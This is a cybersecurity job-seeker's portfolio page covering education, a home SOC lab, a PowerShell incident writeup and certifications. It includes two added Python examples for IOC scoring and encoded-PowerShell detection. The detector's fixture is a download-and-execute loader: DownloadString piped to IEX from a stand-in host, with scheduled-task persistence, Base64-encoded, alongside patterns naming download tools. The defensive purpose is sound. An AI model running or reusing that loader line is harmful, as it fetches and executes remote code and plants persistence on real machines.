01. About Me

I build, monitor, and troubleshoot systems. My experience ranges from Tier 1 IT support to hands-on cybersecurity labs involving SIEM, IDS, threat intelligence, and network security tools.

DEC graduate in Computer Security & Networking, based in Montreal, fluent in French & English, and currently open to SOC analyst and IT support roles.

02. Education

DEC — Computer Security & Networking

Collège de Bois-de-Boulogne · Montreal, QC

Graduated 2025

  • Core focus: network security, ethical hacking, incident response, and system administration.
  • Ran lab environments with Suricata, Splunk, pfSense, and ELK Stack throughout the program.
  • Coursework in cryptography, vulnerability assessment, Windows/Linux hardening, and CCNA-level networking.

Cycle Préparatoire Intégré, Sciences de l'Ingénieur

ENSA Berrechid · Université Hassan 1er · Morocco

2019 – 2021

  • Core curriculum: advanced mathematics (algebra, analysis, probability), physics, electronics, mechanics, and thermodynamics across 4 semesters.
  • Computer science track: algorithmics, C programming, computer architecture, and applied IT tools.
  • Completed the competitive 2-year integrated preparatory cycle, the foundational stage of ENSA Berrechid's 5-year engineering program. Relocated to Montreal in 2021 to pursue specialized studies in applied cybersecurity.

Baccalauréat, Sciences Physiques

Groupe Scolaire RIAD · Casablanca, Morocco

2019

  • Sciences Physiques track, Option Français. Equivalent to the Quebec Diplôme d'études secondaires (DES).
  • Rigorous STEM-focused curriculum covering mathematics, physics, chemistry, and earth sciences with bilingual instruction in French and English.
  • Awarded Félicitations du Jury by the examination board.

03. Where I've Worked

IT Support Technician @ Alorica

July 2025 – December 2025 · Montreal, QC

  • Provided Tier 1/2 IT support for Alorica's internal workforce — diagnosing Windows 10/11, Office 365, VPN, and network peripheral issues across a bilingual (FR/EN) environment at a pace of 25–35 tickets per day.
  • Documented every incident with structured CRM notes to ensure clean handoff and audit trail for L2/L3 escalations.
  • Maintained SLA compliance under high ticket volume, applying the same bilingual communication skills used daily in the lab environment.

04. Some Things I've Built

threat_intel_bot.py

Threat Intelligence Automation Bot

Python framework querying AbuseIPDB, VirusTotal, and AlienVault OTX to automate IOC enrichment and risk scoring. Generates structured JSON threat reports for SOC workflows — cutting manual lookup time from minutes per IOC to seconds, with automated severity classification across all three feeds.

Python · REST APIs · JSON Parsing · Linux · Automation
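The scoring step described above, as an added example that is not the portfolio's own threat_intel_bot.py: each feed's result is normalised to 0..100, then corroboration across feeds drives the severity label. The three feed responses are constructed fixtures so the script runs offline; the AbuseIPDB 100/100 and VirusTotal 8/92 figures are the ones quoted on this page, while the OTX pulse count, the 203.0.113.10 placeholder IP and the per-feed weighting are assumptions.

```python
import json
from dataclasses import dataclass, asdict

# Constructed fixtures (not captured API output). Field names follow the
# trimmed response fields of each public API; the AbuseIPDB 100 and
# VirusTotal 8/92 values are those quoted on the page, the OTX pulse count
# and the TEST-NET IP are assumptions.
SAMPLE_FEEDS = {
    "abuseipdb": {"abuseConfidenceScore": 100, "totalReports": 412},
    "virustotal": {"malicious": 8, "suspicious": 0, "harmless": 70, "undetected": 14},
    "otx": {"pulse_count": 3},
}
CLEAN_FEEDS = {
    "abuseipdb": {"abuseConfidenceScore": 0, "totalReports": 0},
    "virustotal": {"malicious": 0, "suspicious": 0, "harmless": 90, "undetected": 2},
    "otx": {"pulse_count": 0},
}


@dataclass
class FeedScore:
    feed: str
    raw: str    # human-readable finding, kept for the analyst
    score: int  # normalised to 0..100 so feeds can be compared


def score_abuseipdb(r):
    # abuseConfidenceScore is already a 0..100 confidence value.
    c = max(0, min(100, int(r.get("abuseConfidenceScore", 0))))
    return FeedScore("abuseipdb", f"confidence {c}/100", c)


def score_virustotal(r):
    mal, sus = int(r.get("malicious", 0)), int(r.get("suspicious", 0))
    total = mal + sus + int(r.get("harmless", 0)) + int(r.get("undetected", 0))
    if total == 0:
        return FeedScore("virustotal", "no analysis", 0)
    # Assumed weighting: detection ratio as a percentage, plus 5 points per
    # engine calling it malicious, so 8 of 92 engines is not diluted to 9.
    ratio = (mal + 0.5 * sus) / total
    score = min(100, round(100 * ratio) + 5 * mal)
    return FeedScore("virustotal", f"{mal}/{total} engines malicious", score)


def score_otx(r):
    # Assumed weighting: each OTX pulse referencing the IOC adds 25 points.
    pulses = int(r.get("pulse_count", 0))
    return FeedScore("otx", f"{pulses} pulses", min(100, 25 * pulses))


SCORERS = {"abuseipdb": score_abuseipdb, "virustotal": score_virustotal, "otx": score_otx}


def classify(scores):
    # Corroboration across feeds raises severity; one noisy feed alone does not.
    top = max((s.score for s in scores), default=0)
    flagging = sum(1 for s in scores if s.score > 0)
    if top >= 90 and flagging >= 2:
        return "CRITICAL"
    if top >= 90 or (top >= 50 and flagging >= 2):
        return "HIGH"
    if top >= 50 or flagging >= 2:
        return "MEDIUM"
    return "LOW" if flagging else "INFO"


def score_ioc(ioc, feeds):
    scores = [SCORERS[name](feeds[name]) for name in SCORERS if name in feeds]
    return {
        "ioc": ioc,
        "type": "ip",
        "severity": classify(scores),
        "max_score": max((s.score for s in scores), default=0),
        "feeds_flagging": sum(1 for s in scores if s.score > 0),
        "feeds": [asdict(s) for s in scores],
    }


def report_json(ioc, feeds):
    # The structured report a SOC workflow would ingest.
    return json.dumps(score_ioc(ioc, feeds), indent=2)


if __name__ == "__main__":
    print(report_json("203.0.113.10", SAMPLE_FEEDS))
```

The point of the corroboration rule in classify is that a single feed at 100 (AbuseIPDB alone) lands at HIGH, not CRITICAL; it takes a second feed agreeing before the report escalates, which is what keeps one noisy blocklist from paging the on-call.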
mini_soc_lab.sh — suricata + splunk + wazuh

Home Mini-SOC Lab

Full Security Operations Center on a Raspberry Pi. Suricata IDS with the Emerging Threats ruleset feeds into Splunk SIEM for real-time detection, alert correlation, and custom dashboard visualization. Rule tuning — suppressing noisy scanner signatures and home-network baseline traffic — dropped alert volume from ~120 to ~72 daily alerts over a 3-week cycle (~40% reduction). This lab produced a real documented detection: a PowerShell-based fileless attack caught and contained in 42 minutes — see the IR writeup below.

Suricata · Splunk · Raspberry Pi · rsyslog · Linux
incident_response.log — SEVERITY: CRITICAL

Incident Response: PowerShell Threat Detection

A live detection from my Mini-SOC: Wazuh flagged a Base64-encoded PowerShell command (severity 12) on WIN-LAB-01 attempting a remote stage-2 payload download and scheduled-task persistence. I cross-correlated Wazuh HIDS alerts, Suricata network events, and Sysmon endpoint logs in Splunk, then enriched the C2 IP 185.220.101.42 via my Threat Intel Bot — 100/100 AbuseIPDB, 8/92 VirusTotal flags. Detection to containment: 42 minutes. Host isolated, process terminated, malicious scheduled task removed, forensic artifacts preserved.

MITRE ATT&CK: T1059.001 PowerShell · T1027 Obfuscated Files or Information · T1053.005 Scheduled Task · T1105 Ingress Tool Transfer (C2 download)
Wazuh · Suricata · Splunk · Sysmon · Threat Intel Bot · Incident Response
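The detection logic behind this incident, as an added example that is not part of the lab above: decode a PowerShell -EncodedCommand argument from a process-creation event (Base64 of UTF-16LE, the encoding PowerShell requires), look for download and scheduled-task behaviour in the decoded script, and map the hits to the ATT&CK techniques listed above. The events are constructed, the encoded payload is built inside the script from a plain-text stand-in command rather than captured, and the event field names, the 203.0.113.10 URL and the indicator patterns are assumptions.

```python
import base64
import re

# Constructed stand-in for the stage-2 loader described above; it is encoded
# below exactly as PowerShell expects (-EncodedCommand takes Base64 of UTF-16LE).
# The URL uses a TEST-NET address and is not a real indicator.
STAGE2 = ("$c=New-Object Net.WebClient;"
          "$c.DownloadString('http://203.0.113.10/stage2.ps1')|IEX;"
          "schtasks /create /tn Updater /tr powershell.exe /sc onlogon")
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode()

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed process-creation events (Sysmon Event ID 1 style, trimmed to
# the fields used here); the host name is the one quoted on the page.
EVENTS = [
    {"host": "WIN-LAB-01", "image": PS,
     "cmdline": f"powershell.exe -NoP -W Hidden -enc {ENCODED}"},
    {"host": "WIN-LAB-01", "image": PS,
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...)
# and the short form -ec, so match "-e<letters>" and validate the flag after.
ENC_FLAG = re.compile(r"-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Assumed content indicators, mapped to the ATT&CK techniques listed above.
CONTENT_PATTERNS = [
    ("T1053.005", re.compile(r"schtasks(?:\.exe)?\s+/create|Register-ScheduledTask|New-ScheduledTask", re.I)),
    ("T1105", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer|\biwr\b|\bcurl\b", re.I)),
]


def decode_encoded_command(cmdline):
    """Return the decoded script, or None if no valid -EncodedCommand is present."""
    for m in ENC_FLAG.finditer(cmdline):
        flag, blob = m.group(1).lower(), m.group(2)
        if flag != "ec" and not "encodedcommand".startswith(flag):
            continue  # e.g. -ExecutionPolicy, not an encoded command
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except ValueError:
            # binascii.Error (bad Base64) and UnicodeDecodeError (odd byte
            # count) both derive from ValueError: not a usable encoded command.
            return None
    return None


def severity_for(techniques):
    t = set(techniques)
    if {"T1053.005", "T1105"} <= t:
        return "CRITICAL"      # download plus persistence, as in the incident above
    if "T1027" in t and t & {"T1053.005", "T1105"}:
        return "HIGH"
    if "T1027" in t:
        return "MEDIUM"        # encoded command with no recognised behaviour
    return "LOW" if t else "INFO"


def analyse(event):
    techniques = []
    if event["image"].lower().endswith("powershell.exe"):
        techniques.append("T1059.001")
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        techniques.append("T1027")   # Base64-encoded command line
    # Search the decoded script when there is one, otherwise the raw command line.
    body = decoded if decoded is not None else event["cmdline"]
    for tid, pat in CONTENT_PATTERNS:
        if pat.search(body):
            techniques.append(tid)
    return {"host": event["host"], "decoded": decoded,
            "techniques": techniques, "severity": severity_for(techniques)}


if __name__ == "__main__":
    for ev in EVENTS:
        print(analyse(ev))
```

Two details matter in practice: the flag check rejects -ExecutionPolicy and other -e options that are not prefixes of -EncodedCommand, and a blob that is valid Base64 but has an odd byte count is discarded rather than crashing the pipeline, since UTF-16LE text always decodes from an even number of bytes.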
pihole_dns.conf — ~15,000 domains blocked/day

Network-Wide DNS Security Layer

Pi-hole DNS sinkhole blocking ads and malicious domains across the entire home network. Custom blocklists, regex filtering, and whitelist management. Blocks ~15,000 domains/day with full query logging and per-client visibility.

Pi-hole · DNS Security · Network Filtering · Linux
pfsense_rules.xml — 3 VLANs · OpenVPN · Suricata IDS

pfSense Firewall — Secure Network Architecture

Three-VLAN segmented lab (LAN / OPT1 / OPT2) with full LAN/WAN separation, per-segment DHCP and DNS, explicit inter-VLAN firewall rules, NAT, and OpenVPN client + site-to-site VPN. Suricata running in inline IDS mode across all interfaces — actively caught and logged intrusion attempts during red team exercises. Default-deny between segments, tuned ruleset, forensic alert review.

pfSense · OPNsense · OpenVPN · VLANs · Suricata · NAT · DNS · VirtualBox

05. Technical Skills

  • Threat Detection: Suricata
  • SIEM & Log Analysis: Splunk
  • Incident Response: MITRE ATT&CK
  • Network Security: pfSense
  • Endpoint Security: Wazuh HIDS
  • Scripting & Automation: Python


06. Certifications

  • CompTIA CySA+ (valid 2025–2028)
  • CompTIA Security+ (valid 2025–2028)
  • Cisco CCNA ITN (Introduction to Networks)
  • Cisco CCNA SRWE (Switching, Routing, and Wireless Essentials)
  • Cisco CCNA ENSA (Enterprise Networking, Security, and Automation)
  • Cisco Network Defense
  • Microsoft AZ-900
  • Microsoft SC-900

06.1 Language Certifications

  • TCF Canada (Test de Connaissance du Français), French: C1 / B2
  • CELPIP-G (Canadian English Proficiency), English: CLB 9

07. What's Next?

Get In Touch

Actively seeking SOC Analyst, IT Support, and Security Operations roles in Montreal. I typically respond within 24 hours.

Or directly: abdelkrim.zouaki.ti@gmail.com